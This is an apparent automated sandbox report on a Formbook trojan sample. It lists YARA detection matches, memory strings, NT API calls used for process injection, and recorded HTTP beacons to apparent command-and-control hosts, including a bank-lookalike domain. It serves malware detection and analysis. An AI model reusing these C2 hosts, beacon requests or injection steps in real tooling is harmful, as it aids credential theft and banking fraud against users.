        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
        Source: 0098764345678.exe, 00000000.00000003.263275143.000000000564B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comcom
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
        Source: unknownDNS traffic detected: queries for: www.whipbull.com
        Source: global trafficHTTP traffic detected: GET /zzun/?oDH=0v5Tjp&3fZ4-PZ=Kiv179iAIMPDqB30KPMwtVjQGuO+8qaWaLcZydmce/CQLYP70aekBaXIYi060oxX9tqE HTTP/1.1Host: www.whipbull.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /zzun/?3fZ4-PZ=hS6fQYKqHv+OsAYXbPa1KllQZ4uj6G6pTbgTcLclchxJ2x6fi0s26xbgzAwHm+sFKe+r&oDH=0v5Tjp HTTP/1.1Host: www.secure-id6793-chase.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /zzun/?3fZ4-PZ=hS6fQYKqHv+OsAYXbPa1KllQZ4uj6G6pTbgTcLclchxJ2x6fi0s26xbgzAwHm+sFKe+r&oDH=0v5Tjp HTTP/1.1Host: www.secure-id6793-chase.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

        E-Banking Fraud

        barindex
        Source: Yara matchFile source: 4.0.0098764345678.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000012.00000002.529641329.0000000000800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.364459819.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.302568532.0000000003689000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.389433481.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.531711624.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000000.284514841.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.532244734.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Source: 4.0.0098764345678.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 4.0.0098764345678.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 4.0.0098764345678.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0.2.0098764345678.exe.26c6388.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
        Source: 00000012.00000002.529641329.0000000000800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000012.00000002.529641329.0000000000800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000012.00000002.529641329.0000000000800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000000.364459819.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000007.00000000.364459819.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000000.364459819.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000000.00000002.302568532.0000000003689000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000000.00000002.302568532.0000000003689000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000000.00000002.302568532.0000000003689000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000000.389433481.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000007.00000000.389433481.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000000.389433481.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000012.00000002.531711624.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000012.00000002.531711624.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000012.00000002.531711624.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000000.284514841.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000000.284514841.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000000.284514841.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000012.00000002.532244734.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000012.00000002.532244734.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000012.00000002.532244734.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: Process Memory Space: 0098764345678.exe PID: 1260, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: Process Memory Space: msiexec.exe PID: 5440, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0098764345678.exe, AddCompanyForm.csLong String: Length: 20037
        Source: 0.0.0098764345678.exe.2e0000.0.unpack, AddCompanyForm.csLong String: Length: 20037
        Source: 0098764345678.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 4.0.0098764345678.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 4.0.0098764345678.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 4.0.0098764345678.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0.2.0098764345678.exe.26c6388.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
        Source: 00000012.00000002.529641329.0000000000800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000012.00000002.529641329.0000000000800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000012.00000002.529641329.0000000000800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000000.364459819.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000007.00000000.364459819.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000000.364459819.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000002.302568532.0000000003689000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000000.00000002.302568532.0000000003689000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.302568532.0000000003689000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000000.389433481.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000007.00000000.389433481.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000000.389433481.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000012.00000002.531711624.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000012.00000002.531711624.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000012.00000002.531711624.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000000.284514841.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000000.284514841.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000000.284514841.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000012.00000002.532244734.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000012.00000002.532244734.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000012.00000002.532244734.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: Process Memory Space: 0098764345678.exe PID: 5832, type: MEMORYSTRMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, score = file, reference = Internal Research
        Source: Process Memory Space: 0098764345678.exe PID: 1260, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: msiexec.exe PID: 5440, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_046D00D7
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_046D0229
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_04B64548
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_04B6E820
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_04B6E810
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_04B6BF54
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_07209678
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_0720CE50
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_07203EF8
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_07202D00
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_072055B0
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_07206460
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_07204BB8
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_0720C020
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_07209669
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_072086E8
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_07203EEA
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_072086D8
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_072055A0
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_072084A0
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_072084B0
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_0720D348
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_07203348
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_07203358
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_07204BA8
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_072063C5
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_07208AC8
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_07208AD8
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_07208138
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_07208900
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_07208910
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_07208148
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_07205068
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_07205058
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01304120
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012EF900
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013099BF
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A830
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013BE824
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A1002
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013120A0
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B20A8
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012FB090
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B28EC
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B2B28
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130AB40
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0138CB4F
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131EBB0
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131138B
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013923E3
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A03DA
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013ADBD2
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131ABD8
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B236
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0139FA2B
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B22AE
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4AEF
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E0D20
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B2D07
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B1D55
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01312581
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A2D82
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012FD5E0
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B25DD
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F841F
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B477
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013AD466
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4496
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B1FF1
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013BDFCE
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01306E30
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013AD616
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B2EF7
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: String function: 012EB150 appears 136 times
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013299A0 NtCreateSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329860 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329840 NtDelayExecution,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013298F0 NtReadVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329A20 NtResumeThread,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329A00 NtProtectVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329A50 NtCreateFile,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329540 NtReadFile,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013295D0 NtClose,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329710 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013297A0 NtUnmapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329780 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329FE0 NtCreateMutant,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329660 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013296E0 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329950 NtQueueApcThread,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013299D0 NtCreateProcessEx,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329820 NtEnumerateKey,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0132B040 NtSuspendThread,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013298A0 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329B00 NtSetValueKey,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0132A3B0 NtGetContextThread,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329A10 NtQuerySection,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329A80 NtOpenDirectoryObject,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0132AD30 NtSetContextThread,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329520 NtWaitForSingleObject,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329560 NtWriteFile,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013295F0 NtQueryInformationFile,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329730 NtQueryVirtualMemory,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0132A710 NtOpenProcessToken,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0132A770 NtOpenThread,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329770 NtSetInformationFile,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329760 NtOpenProcess,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329610 NtEnumerateValueKey,
